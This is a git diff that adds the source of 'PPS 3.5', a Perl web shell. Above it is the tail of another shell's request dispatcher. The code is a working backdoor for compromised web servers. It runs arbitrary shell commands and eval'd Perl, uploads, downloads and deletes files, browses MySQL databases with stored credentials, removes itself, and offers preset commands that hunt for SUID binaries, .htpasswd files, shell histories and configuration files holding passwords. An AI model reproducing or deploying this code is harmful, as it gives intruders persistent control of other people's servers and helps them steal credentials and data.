+print "<table width=100%>";print '<font face="Verdana" size="1">';$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth = $dbh->prepare("SHOW DATABASES");$sth->execute;print "<b>DATABASES:</b><br>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td><table width=100%>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$zapros = "SHOW TABLES FROM `$ddb`";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth=$dbh->prepare($zapros);$sth->execute;print "$tabe";print "<b>Tables from $ddb:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_tables_form();}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";&PrintVar;&PrintPageFooter;}sub sql_set_cookie{print "Set-Cookie: hhost=$hhost;\n";print "Set-Cookie: pport=$pport;\n";print "Set-Cookie: usser=$usser;\n";print "Set-Cookie: passs=$passs;\n";print "Set-Cookie: dbb=$dbb;\n";}sub sql_query{sql_vars_set();&GetCookies;$hhost=$Cookies{'hhost'};$pport=$Cookies{'pport'};$usser=$Cookies{'usser'};$passs=$Cookies{'passs'};$dbb=$Cookies{'dbb'};$table=$Cookies{'table'};&PrintPageHeader("c");sql_vars_set();sql_loginform();$qquery=$in{'cquery'};if ($qquery){$qquery="SELECT CONCAT_WS(0x3a,$qquery) FROM `$dbb`.`$table` LIMIT 0,30";}else{$qquery = $in{'query'};}$dbh = DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);$sth=$dbh->prepare("SHOW DATABASES");$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100% cellspacing=0 cellpadding=1 cols=2>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while ($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td><table width=100%>";sql_query_form();print "$tabe</td>$tabe";$s4et=0;$sth = $dbh->prepare($qquery);$sth->execute;print "<b>Results:</b><br>";print " <table border=1 cellspacing=0 cellpadding=1 cols=10>";while ($ref=$sth->fetchrow_arrayref){$s4et++;print "<tr><td><font face=Verdana size=1>[$s4et]</font></td><td><font face=Verdana size=1>$$ref[0]</font></td></tr>";}$s4et=0;$rc=$sth->finish;$rc=$dbh->disconnect;print "$tabe";print '<script>document.querys.query.value="'.$qquery.'";</script>';&PrintVar;&PrintPageFooter;}sub sql_connect{sql_vars_set();sql_set_cookie();&PrintPageHeader("c");sql_loginform();sql_vars_set();$s4et=0;$dbb="";$dbh=DBI->connect("DBI:mysql:$dbb:$hhost:$pport",$usser,$passs);if($hhost && $pport && $usser && $passs){$zapros = "SHOW DATABASES";print '<script>document.querys.query.value="'.$zapros.'";</script>';$sth = $dbh->prepare($zapros);$sth->execute;print '<font face="Verdana" size="1">';print "<table width=100%>";print "<b>DATABASES:</b>";print "<td><table border=1 cellspacing=0 cellpadding=1>";while($ref=$sth->fetchrow_arrayref){$s4et++;sql_databases_form();}$rc=$sth->finish;print "$tabe</td><td>";sql_query_form();print "</td>$tabe";$rc = $dbh->disconnect;print '</font>';return;}print "Some error...";print '</font>';&PrintVar;&PrintPageFooter;}sub UploadFile{if($TransferFile eq ""){&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintFileUploadForm;&PrintPageFooter;return;}&PrintPageHeader("c");file_header();print "<font size=1>Uploading $TransferFile to $CurrentDir...<br>";chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;$TransferFile =~ m!([^/^\\]*)$!;$TargetName .= $PathSep.$1;$TargetFileSize = length($in{'filedata'});if(open(UPLOADFILE, ">$TargetName")){binmode(UPLOADFILE) if $WinNT;print UPLOADFILE $in{'filedata'};close(UPLOADFILE);print "Transfered $TargetFileSize Bytes.<br>";print "File Path: $TargetName<br>";}else{print "Failed: $!<br>";}print "</font>";&PrintCommandLineInputForm;&PrintPageFooter;}sub Remove{use Cwd qw(abs_path);my $path=abs_path($0);system("rm $path");}&ReadParse;&GetCookies;$ScriptLocation=$ENV{'SCRIPT_NAME'};$ServerName=$ENV{'SERVER_NAME'};$LoginPassword=$in{'p'};$RunCommand=$in{'c'};$RunCommand2=$in{'l11'};if($RunCommand2){$RunCommand=$RunCommand2}$RunCommand1=$in{'aliases'};if($RunCommand1){$RunCommand=$RunCommand1}$RunCommand2=$in{'group'};if($RunCommand2){$gr=$Cookies{'f'};$gre='';$gr=~s/\%([A-Fa-f0-9]{2})/pack('C',hex($1))/seg;@grr=split(/\s/,$gr);if($RunCommand2 eq "untar"){foreach $arg(@grr){if($arg ne '..'){$gre.="tar xfz $arg;"}}}if($RunCommand2 eq "tar"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="tar cfz z_$$.tar.gz".$arg1;}if($RunCommand2 eq "delete"){foreach $arg(@grr){if($arg ne '..'){$arg1.=' '.$arg}}$gre="rm -rf$arg1";}$RunCommand=$gre;}$ChangeDir=$in{'cc'};$ZipFile=$in{'zip'};$ZipArch=$in{'arh_name'};$UnZipArch=$in{'unzip_name'};$DelFile=$in{'del_file'};$DelDir=$in{'del_dir'};$MkDir=$in{'md'};$ViewF=$in{'path'};$Fchmod=$in{'fchmod'};$Fdata=$in{'fdata'};$MakeFile=$in{'mf'};$TransferFile=$in{'f'};$Options=$in{'o'};$Action=$in{'a'};$Action="filemanager" if($Action eq "");$CurrentDir=$in{'d'};chop($CurrentDir=`$CmdPwd`) if($CurrentDir eq "");$LoggedIn=$Cookies{'SAVEDPWD'} eq $Password;if($Action eq "login" || !$LoggedIn){&PerformLogin;}elsif($Action eq "command"){&ExecuteCommand;}elsif($Action eq "RT"){&RT;}elsif($Action eq "view_file"){&ViewFile;}elsif($Action eq "command1"){&ExecuteCommand1;}elsif($Action eq "filemanager"){&FileManager;}elsif($Action eq "console"){&Console;}elsif($Action eq "upload"){&UploadFile;}elsif($Action eq "download"){&SendFileToBrowser($CurrentDir."/".$TransferFile);}elsif($Action eq "systeminfo"){&SystemInfo;}elsif($Action eq "code"){&EvalCodePrint;}elsif($Action eq "eval_code"){&EvalCode;}elsif($Action eq "net"){&NetPrint;}elsif($Action eq "net_go"){&NetGo;}elsif($Action eq "sql"){&sql;}elsif($Action eq "sql_connect"){&sql_connect;}elsif($Action eq "sql_query"){&sql_query;}elsif($Action eq "remove"){&Remove;}elsif($Action eq "edit_file"){&EditFile;}elsif($Action eq "edit_file_path"){&EditFilePath;}elsif($Action eq "sql_databases"){&sql_databases;}elsif($Action eq "sql_tables"){&sql_tables;}elsif($Action eq "sql_columns"){&sql_columns;}elsif($Action eq "logout"){&PerformLogout;}
diff --git a/pl/pps-pl/pps-v3.5.pl b/pl/pps-pl/pps-v3.5.pl
new file mode 100644
index 00000000..31189064
--- /dev/null
+++ b/pl/pps-pl/pps-v3.5.pl
@@ -0,0 +1,79 @@
+#!/usr/bin/perl
+#PPS 3.5 shell by Pashkela [RDOT.ORG] © 2012
+#Developer By Abu Abdullah [ehcommunity.com] © 2012
+use strict;
+undef $modules::Module::var;
+my ($Password,$CommandTimeoutDuration,$tab,$tbb,$verd,$tabe,$div,$dive,$WinNT,$NTCmdSep,$UnixCmdSep,$ShowDynamicOutput,$CmdSep,$PathSep,$Redirector,$CmdPwd,$in,$loc,$key,$val,$MultipartFormData,$Boundary,$HeaderBody,@in,%in,$id,@list,$Header,$Body,$s,$CurrentDir,$arg,$ii,@suffixlist,$size1,$size,$file,%q,$LoggedIn,%Cookies,$EncodedCurrentDir,$HtmlMetaHeader,$time,$ScriptLocation,@httpcookies,$cookie,$LoginPassword,$Prompt,$ServerName,$wr,$ffs,$ffe,$TransferFile,$ViewF,$RunCommand,$RunCommand1,$Command,$langs,$httpd,$hdd1,$hdd,$perlv,$phpv,$hosts,$downloaders,$hdd1,$OldDir,$ChangeDir,$MkDir,$MakeFile,$ZipArch,$ZipFile,$UnZipArch,$DelFile,$DelDir,$f,$hhost,$pport,$usser,$passs,$dbb,$zapros,$ref,$s4et,$rip,$bbc,$port,$target,$ccode,$fpath,@file,$fccodde,$fccode,$ffpath,$table,$column,$dbh,$sth,$rc,$qqquery,$ddb,$TargetName,$TargetFileSize,$qquery,$RunCommand2,$gr,$gre,@grr,$arg1,$Fchmod,$Fdata,$Options,$Action,$hddall,$hddfree,$hddproc,$uname,$idd):shared;
+$Password="63a9f0ea7bb98050796b649e85481845";# root
+$CommandTimeoutDuration=30;# max time of command execution in seconds
+$tab='<table>';$tbb="<table width=100%";$verd="<font face=Verdana size=1>";$tabe='</table>';$div='<div class=content><pre class=ml1>';$dive='</pre></div>';use Digest::MD5 qw(md5_hex);$WinNT=0;$NTCmdSep="&";$UnixCmdSep=";";$ShowDynamicOutput=1;$CmdSep=($WinNT?$NTCmdSep:$UnixCmdSep);$CmdPwd=($WinNT?"cd":"pwd");$PathSep=($WinNT?"\\":"/");$Redirector=($WinNT?" 2>&1 1>&2":" 1>&1 2>&1");use File::Basename;use MIME::Base64;my @last:shared;sub cod($){my $url=~s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;$url=encode_base64($_[0]);return $url;}sub dec($){ my $url1=decode_base64($_[0]);return $url1;}sub ReadParse {local (*in)=@_ if @_;$MultipartFormData=$ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/;if($ENV{'REQUEST_METHOD'} eq "GET"){$in=$ENV{'QUERY_STRING'};}elsif($ENV{'REQUEST_METHOD'} eq "POST"){binmode(STDIN) if $MultipartFormData & $WinNT;read(STDIN,$in,$ENV{'CONTENT_LENGTH'});}if($ENV{'CONTENT_TYPE'}=~/multipart\/form-data; boundary=(.+)$/){$Boundary='--'.$1;@list=split(/$Boundary/,$in);$HeaderBody=$list[1];$HeaderBody=~/\r\n\r\n|\n\n/;$Header=$`;$Body=$';$Body=~s/\r\n$//;$in{'filedata'}=$Body;$Header=~/filename=\"(.+)\"/;$in{'f'}=$1;for(my $i=2;$list[$i];$i++){$list[$i]=~s/^.+name=$//;$list[$i]=~/\"(\w+)\"/;$key=$1;$val=$';$val=~s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}=$val;}}else{@in=split(/&/,$in);foreach my $i(0 .. $#in){$in[$i]=~s/\+/ /g;($key,$val)=split(/=/,$in[$i],2);$key=~s/%(..)/pack("c",hex($1))/ge;$val=~s/%(..)/pack("c",hex($1))/ge;$in{$key}.="\0" if(defined($in{$key}));$in{$key}.=$val;}}}sub uname{$s="uname -a";$s.=" -U $q{u}" if($q{u});return $s;}sub hddall{$s='df -k /|sed 1d|awk "{total += \$2} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddfree{$s='df -k /|sed 1d|awk "{total += \$4} {print total/1024/1024}"';$s.=" -U $q{u}" if($q{u});return $s;}sub hddproc{$s='df -k /| sed 1d | awk "{total += \$5} {print 100-total}"';$s.=" -U $q{u}" if($q{u});return $s;}$hddall=hddall();$hddfree=hddfree();$hddproc=hddproc();sub PH{printf ("%.2f",(@_))};sub id{$s="id";$s.=" -U $q{u}" if($q{u});return $s;}sub dir_read($){if(!-r $_[0]||$_[0]=~m/\"/gis||$_[0]=~m/\s/gis||$_[0]=~m/\(/gis||$_[0]=~m/\)/gis){return "# Can't read $_[0]!";}else{$_[0]=~s/\/\//\//g;return "cd ".$_[0];}}sub dlink($){if(-l $_[0]){return '->'.readlink $_[0]}}sub dir_list{my @list=();$CurrentDir=~s!\Q//!/!g;my $dir=$CurrentDir;@list=scan_dir($dir);$id=0;foreach $arg(@list){$id++;$ii='d'.$id;my $name=fileparse($arg,@suffixlist);if(-d $arg){print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form method=POST name='.$ii.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="'.dir_read($arg).'"><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;<b>[ '.$name.dlink($arg).' ]</b></font></a></form></td><td>dir</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_dir value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=deldir><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td></table/></td></tr>';}else{$size1=(stat $arg)[7]/1024;if($size1<1000){$size=sprintf("%.2f",($size1))." KB";}else{$size=sprintf("%.2f",($size1/1024))." MB";}print '<tr class='.($id%2==0?"l1":"l2").'><th class=chkbx><input type=checkbox class=chkbx name=lo></th><td><form name='.$ii.' method=post><input type=hidden name=path id=view value='.$name.'><input type=hidden name=a value=view_file><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'.submit()"><font face="Verdana" size="2">&nbsp;'.$name.dlink($arg).'</font></a></form></td><td>'.$size.'</td><td>'.mt1((stat($arg))[9]).'</td>'.owner($arg).'<td>'.$tab.'<td><form name='.$ii.'rt method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="RT"><input type="hidden" name="fdata" value='.cod(mt1((stat($arg))[9])).'><input type="hidden" name="fchmod" value='.perm($arg).'><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'rt.submit()">R T </a></form></td><td><form name='.$ii.'ed method=post><input type=hidden name=path id=edit1_file value='.$name.'><input type=hidden name=a value=edit_file_path><input type=hidden name=d value='.$CurrentDir.'><a href="javascript:document.'.$ii.'ed.submit()">E </a></form></td><td><form name='.$ii.'d method="POST"><input type="hidden" name="d" value="'.$CurrentDir.'"><input type="hidden" name="a" value="download"><input type="hidden" name="f" value='.$name.'><a href="javascript:document.'.$ii.'d.submit()">D </a></form></td><td><form method=POST name='.$ii.'z><input type=hidden name=zip value='.$name.'><input type=hidden name=arh_name value='.$ii.'z><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=zip><a href="javascript:document.'.$ii.'z.submit()">[zip]</a></form></td><td><form method=POST name='.$ii.'uz><input type=hidden name=unzip_name value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=unzip><a href="javascript:document.'.$ii.'uz.submit()">[unzip]</a></form></td><td><form method=POST name='.$ii.'del><input type=hidden name=del_file value='.$name.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value=delfile><a href="javascript:document.'.$ii.'del.submit()">[<font color=#FF0000>x</font>]</a></form></td>'.$tabe.'</td></tr>'}}print $tabe;sub perm($){my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);return $mode;}sub owner($){my $uid=(stat $_[0])[4];my $user=(getpwuid $uid)[0];my $uid1=(stat $_[0])[5];my $group=(getgrgid $uid1)[0];my $mode=sprintf("%04o",((stat($_[0]))[2])&07777);my $suid=substr $mode,0,1;my $last=substr $mode,1;if($suid==4||$suid==6||$suid==2){if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FF0000>'.$last.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#FFFFFF>'.$last.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><b><font color=#FFD700>'.$suid.'</font></b><font color=#25ff00>'.$last.'</font></td>';}}else{if(!-r $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FF0000>'.$mode.'</font></td>';}elsif(!-w $_[0]){return '<td>'.$user.'/'.$group.'</td><td><font color=#FFFFFF>'.$mode.'</font></td>';}else{return '<td>'.$user.'/'.$group.'</td><td><font color=#25ff00>'.$mode.'</font></td>';}}}sub mt{my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime();my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub mt1($){my($seconds,$minutes,$hours,$day,$month,$year,$wday,$yday,$isdst)=localtime($_[0]);my $mmtime=($year+1900).'-'.sprintf("%02d",($month+1)).'-'.sprintf("%02d",$day).' '.sprintf("%02d",$hours).':'.sprintf("%02d",$minutes).':'.sprintf("%02d",$seconds);return $mmtime;}sub scan_dir{my ($dir)=@_;my @dirs=();my @files=();my @list=();my @file=();for $file (glob($dir.'/.*')){if(-d $file && $file ne $dir.'/.'){push @dirs,$file;}if(-f $file){push @files,$file;}}for $file (glob($dir.'/*')){if(-d $file) {push @dirs,$file;}else{push @files,$file;}}@list=(@dirs,@files);return @list;}}sub HtmlSpecialChars($){my ($st)=@_;$st=~s|<|< |g;$st=~s|>| >|g;return $st;}sub DeHtmlSpecialChars($){my ($st)=@_;$st=~s|< |<|g;$st=~s| >|>|g;return $st;}
+$uname = uname();$idd = id();sub P{print @_}sub PrintPageHeader{print "Content-type: text/html\n\n";&GetCookies;$LoggedIn = $Cookies{'SAVEDPWD'} eq $Password;if($LoggedIn != 1) {$Password = 0}$EncodedCurrentDir = $CurrentDir;$EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;print <<END;
+<html><head><title>PPS 3.5</title>$HtmlMetaHeader<style>body{background-color:#444;color:#e1e1e1;font: 9pt Monospace,'Courier New';text-decoration:none;}body,td,th{font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1;}table.info{color:#fff;background-color:#222;}span,h1,a{color: #df5 !important;}span{font-weight: bolder;}h1{border-left:5px solid #df5;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px;}div.content{padding: 5px;margin-left:5px;background-color:#333;font: 9pt Monospace,'Courier New';}a{text-decoration:none;}a:hover{text-decoration:underline;}.ml1{border:1px solid#444;font:9pt Monospace,'Courier New';color:#e1e1e1;padding:5px;margin:0;overflow:auto;}.bigarea{width:100%;height:250px;}input,textarea,select{margin:0;color:#fff;background-color:#555;border:1px solid #df5;font: 9pt Monospace,'Courier New';}form{margin:0px;}#toolsTbl{text-align:center;}.toolsInp{width: 300px}.toolsInp1{border: none}.main th{text-align:left;background-color:#5e5e5e;}.main tr:hover{background-color:#5e5e5e}.l1{background-color:#444}.l2{background-color:#333}pre{font-family:Courier,Monospace;}</style></head><body onLoad="changeText();document.checkbox.@_.focus()" bgcolor="#000000" topmargin="0" leftmargin="0" marginwidth="0" marginheight="0"><table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Hdd:<br>DateTime:<br>Pwd:</span></td><td><nobr>
+END
+P(`$uname`);print "</nobr><br>";P(`$idd`);print "<br>";PH(`$hddall`);print " GB <span>Free: </span>";PH(`$hddfree`);print " GB [ ";P(`$hddproc`);print "% ]";$time=mt();print "<br>$time$tab <td>";my $cwd="";my @path=split("/",$CurrentDir);my $mode=sprintf("%04o",((stat($CurrentDir))[2])&07777);my $ss=0;print '<table cellpadding=0 cellspacing=0><td><form method=POST name=cwd0><a href="javascript:document.cwd0.submit()">[..]&nbsp;</a><input type=hidden name=cc value="/"><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';foreach my $ar(@path){if($ar){$cwd .= "/".$ar;$ss++;print '<td><form method=POST name=cwd'.$ss.'><a href="javascript:document.cwd'.$ss.'.submit()">/'.$ar.'</a><input type=hidden name=cc value='.$cwd.'><input type=hidden name=a value=command><input type=hidden name=d value='.$CurrentDir.'><input type=hidden name=c value="changedir"></form></td>';}}my $fw="<font face=Verdana size=2 color=#FFFFFF>";my $fe="</font>";print $tabe;sub cwdcol{if(!-r $CurrentDir){return '<font color=#FF0000>'.$mode.'</font>';}elsif(!-w $CurrentDir){return '<font color=#FFFFFF>'.$mode.'</font>';}else{return '<font color=#25ff00>'.$mode.'</font>';}}print "<td>".cwdcol()."</td><td><a href=$ScriptLocation> [ home ] </a></td></td>$tabe";print <<END;
+</td><td width=1 align=right><nobr><span>Server IP:</span><br>$ENV{'SERVER_ADDR'}<br><span>Client IP:</span><br>$ENV{'REMOTE_ADDR'}</nobr></td></tr>$tabe<table width=100% bgcolor=#444><td><form method="POST" name=systeminfo><input type="hidden" name="a" value="systeminfo"><input type=hidden name=d value=$CurrentDir><a href="javascript:document.systeminfo.submit()">$fw [ $fe Sysinfo $fw ] $fe</a></form></td><td><form method=POST name=files><input type=hidden name=cc value=$CurrentDir><a href="javascript:document.files.submit()">$fw [ $fe Files $fw ] $fe</a><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="cd $CurrentDir"></form></td><td><form method="POST" name=consoler><input type="hidden" name="a" value="console"><input type="hidden" name="d" value=$CurrentDir><a href="javascript:document.consoler.submit()"> $fw [ $fe Console $fw ] $fe</a></form></td><td><form method="POST" name=sqlman><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="sql"><a href="javascript:document.sqlman.submit()">$fw [ $fe SQL $fw ] $fe</a></form></td><td><form method="POST" name=backconn><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="net"><a href="javascript:document.backconn.submit()">$fw [ $fe Network $fw ] $fe</a></form></td><td><form method="POST" name=evalc><input type=hidden name=d value=$CurrentDir><input type="hidden" name="a" value="code"><a href="javascript:document.evalc.submit()">$fw [ $fe Code $fw ] $fe</a></form></td><td><form method="POST" name=logout><input type="hidden" name="a" value="logout"><a href="javascript:document.logout.submit()">$fw [ $fe Logout $fw ] $fe</a></form></td><td><form method="POST" name=remove><input type="hidden" name="a" value="remove"><a href="javascript:document.remove.submit()">$fw [ $fe Self remove $fw ] $fe</a></form></td>$tabe</tr>$tabe<font color="#C0C0C0" size="2">
+END
+}sub PrintLoginForm{print "<center><form name=f method=POST><input type=password name=p><input type=submit value='>>'></form></center>";}sub PrintPageFooter{print "</font></body></html>";}sub GetCookies{@httpcookies=split(/; /,$ENV{'HTTP_COOKIE'});foreach $cookie(@httpcookies){($id,$val)=split(/=/,$cookie);$Cookies{$id}=$val;}}sub PerformLogout{print "Set-Cookie: SAVEDPWD=;\n;Set-Cookie: last_command=;\n";print "Content-type: text/html\n\n";&PrintLoginForm;}sub PerformLogin{if(md5_hex($LoginPassword) eq $Password){print "Set-Cookie: SAVEDPWD=".md5_hex($LoginPassword).";\n";&PrintPageHeader("c");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}else{print "Content-type: text/html\n\n";&PrintLoginForm;}}sub FileManager{&PrintPageHeader("f");file_header();&PrintCommandLineInputForm;&PrintPageFooter;}sub PrintCommandLineInputForm{$Prompt = $WinNT ? "$CurrentDir> " : "[$ServerName $CurrentDir]\$ ";dir_list();print "<tr><form method=post><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><select name=group><option value=delete>Delete</option><option value=tar>Compress [tar.gz]</option><option value=untar>Uncompress [tar.gz]</option></select><input type=submit value='>>' onclick='validate()'></tr></form>$dive";sub wr_cur {if(!-w $CurrentDir){print '<font color=#FF0000>[Not writable]</font>';}else{print '<font color=#25ff00>[Writeable]</font>';}}sub PrintVar{print <<END;
+<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'><tr><td><form method=POST><span>Change dir:</span><br><input class=toolsInp type=text name=cc value=$CurrentDir><input type=submit value='>>'><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="changedir"></form></td><td><form method=POST><span>Read file:</span><br><input class='toolsInp' type=text name=path><input type=hidden name=a value=view_file><input type=hidden name=d value=$CurrentDir><input type=submit value='>>'></form></td></tr><tr><td><form method=POST><span>Make dir:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=md><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makedir"><input type=submit value='>>'></form></td><td><form method=POST><span>Make file:</span>
+END
+wr_cur();print <<END;
+<br><input class='toolsInp' type=text name=mf><input type=hidden name=a value=command><input type=hidden name=d value=$CurrentDir><input type=hidden name=c value="makefile"><input type=submit value='>>'></form></td></tr><tr><td><form name="ff" method="POST"><span>Execute:</span><br><input type="hidden" name="a" value="command"><input type="hidden" name="d" value="$CurrentDir"><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
+<td>
+END
+&PrintFileUploadForm;print <<END;
+</td>$tabe
+END
+}sub PrintFileUploadForm{print <<END;
+<span>Upload file: </span>
+END
+wr_cur();print <<END;
+<br><form name="upload_file_form" enctype="multipart/form-data" method="POST"><input type="file" name="f" class=toolsInp><input type="submit" value=">>"><input type="hidden" name="d" value="$CurrentDir"><input type="hidden" name="a" value="upload"></form><script>function setCookie(name,value,expires,path,domain,secure){document.cookie=name+"="+escape(value)+((expires)?";expires="+expires:"")+((path)?";path="+path:"")+((domain)?";domain="+domain:"")+((secure)?";secure":"");}function validate(form){var namelist='';var names=document.getElementsByName('lo');  var lo=document.getElementsByName('zip');for(var i=0;i<names.length;i++){if(names[i].checked){namelist+=lo[i].value+' ';}}setCookie("f",namelist,"","/");}function sall(form){var namelist='';var ch=true;var names=document.getElementsByName('lo');var ss=document.getElementsByName('ch11');if(ss[0].checked){ch=true;}else{ch=false;}for(var i=0;i<names.length;i++){names[i].checked=ch;}}</script>
+END
+}&PrintVar;}sub ah($){(my $str=shift)=~ s/(.|\n)/sprintf("%02lx", ord $1)/eg;return $str;}sub ha($){(my $str=shift)=~s/([a-fA-F0-9]{2})/chr(hex $1)/eg;return $str;}sub ConsoleP{print <<END;
+<tr><td><form name="run" method="POST"><br><input type=text size="2" id="sub3" disabled value='\$ '><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><input type=text name="c" size=100 class=toolsInp1 id='lsname' onkeypress="s(event)" value=''><input type=submit class=toolsInp1 id="sub4" value=''></form></td></tr>$tab<td><form name="alias" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=aliases id='nnname' class=toolsInp><option value="ls -lha">List dir</option><option value="lsattr -va">list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">show opened ports</option><option value="ps aux">process status</option><optgroup label="-Find-"></optgroup><option value="find / -type f -perm -04000 -ls">find all suid files</option><option value="find . -type f -perm -04000 -ls">find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">find all sgid files</option><option value="find . -type f -perm -02000 -ls">find sgid files in current dir</option><option value="find / -type f -name config.inc.php">find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">find config* files</option><option value="find . -type f -name &quot;config*&quot;">find config* files in current dir</option><option value="find / -perm -2 -ls">find all writable folders and files</option><option value="find . -perm -2 -ls">find all writable folders and files in current dir</option><option value="find / -type f -name service.pwd">find all service.pwd files</option><option value="find . -type f -name service.pwd">find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">find all .htpasswd files</option><option value="find . -type f -name .htpasswd">find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">find all .bash_history files</option><option value="find . -type f -name .bash_history">find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">find .fetchmailrc files in current dir</option><optgroup label="-Locate-"></optgroup><option value="locate httpd.conf">locate httpd.conf files</option><option value="locate vhosts.conf">locate vhosts.conf files</option><option value="locate proftpd.conf">locate proftpd.conf files</option><option value="locate psybnc.conf">locate psybnc.conf files</option><option value="locate my.conf">locate my.conf files</option><option value="locate admin.php">locate admin.php files</option><option value="locate cfg.php">locate cfg.php files</option><option value="locate conf.php">locate conf.php files</option><option value="locate config.dat">locate config.dat files</option><option value="locate config.php">locate config.php files</option><option value="locate config.inc">locate config.inc files</option><option value="locate config.inc.php">locate config.inc.php</option><option value="locate config.default.php">locate config.default.php files</option><option value="locate config">locate config* files </option><option value="locate '.conf'">locate .conf files</option><option value="locate '.pwd'">locate .pwd files</option><option value="locate '.sql'">locate .sql files</option><option value="locate '.htpasswd'">locate .htpasswd files</option><option value="locate '.bash_history'">locate .bash_history files</option><option value="locate '.mysql_history'">locate .mysql_history files</option><option value="locate '.fetchmailrc'">locate .fetchmailrc files</option><option value="locate backup">locate backup files</option><option value="locate dump">locate dump files</option><option value="locate priv">locate priv files</option></select><input type=submit id="sub2" value='>>'></form></td><td><form name="l11" method="POST"><br><input type="hidden" name="a" value="command1"><input type="hidden" name="d" value="$CurrentDir"><select name=l11 id='l11' class=toolsInp>
+END
